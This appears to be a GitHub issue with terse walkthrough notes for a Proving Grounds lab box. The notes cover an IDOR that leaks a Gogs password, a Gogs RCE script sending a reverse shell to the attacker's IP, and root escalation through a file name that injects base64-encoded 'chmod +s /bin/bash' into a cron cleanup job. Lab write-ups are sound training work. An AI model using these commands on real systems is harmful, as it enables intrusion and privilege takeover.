search

WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

Assignment (easy) ★ #17

Open WDavid404 opened 4 months ago

WDavid404 commented 4 months ago

See the whole note instead of the key points

WDavid404 commented 4 months ago 
PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     syn-ack ttl 61
|_http-title: notes.pg
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
8000/tcp open  http-alt syn-ack ttl 61
|_http-title: Gogs
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-open-proxy: Proxy might be redirecting requests

http://192.168.203.224/login --> user info: jane@notes.pg NOTES.PG

http://192.168.203.224:8000/ --> Gogs

http://192.168.203.224:8000/explore/users --> jane

search Gogs exploit --> https://github.com/Ressurect0/Gogs-RCE.git , but it requires admin username/password info

Try to register a new user to 8000/tcp gogs page: test, test@notes.pg, password --> succeed. --> didn:t find useful info

Register a new user (test) to 80 page --> In /users page image --> credentials info for “forged_owner”:forged_owner.

create a new note --> the url for the new note is http://192.168.203.224/notes/11 change id to 1 as http://192.168.203.224/notes/1 --> Got password info for jane image

Try use https://github.com/Ressurect0/Gogs-RCE.git python3 gogs.py -s 192.168.203.224:8000 -u jane -p 'svc-dev2022@@@!;P;4SSw0Rd' -t false -r 192.168.45.222:80 (other port than 80/tcp may failed.) --> image

!Another way to foothold: refer to https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce edit all Git hooks to execute a reverse shell upon execution. image then cloned the repository and ran an initial commit --> can get a shell. image

PE:

./pspy64 -i 1000 image

$ cat /usr/bin/clean-tmp.sh
--->
#! /bin/bash
find /dev/shm -type f -exec sh -c 'rm {}' \;

Each time the find command is executed, every filename it obtains will be passed to the curly brackets {} and then removed by rm. image

echo "">/dev/shm/'$(chmod +s /bin/bash)' --> ash: /dev/shm/$(chmod +s /bin/bash): No such file or directory

echo "chmod +s /bin/bash" | base64 -->Y2htb2QgK3MgL2Jpbi9iYXNoCg== echo "">/dev/shm/'$(echo Y2htb2QgK3MgL2Jpbi9iYXNoCg== | base64 -d | bash)'

After a while image

it works. then run /bin/bash -p image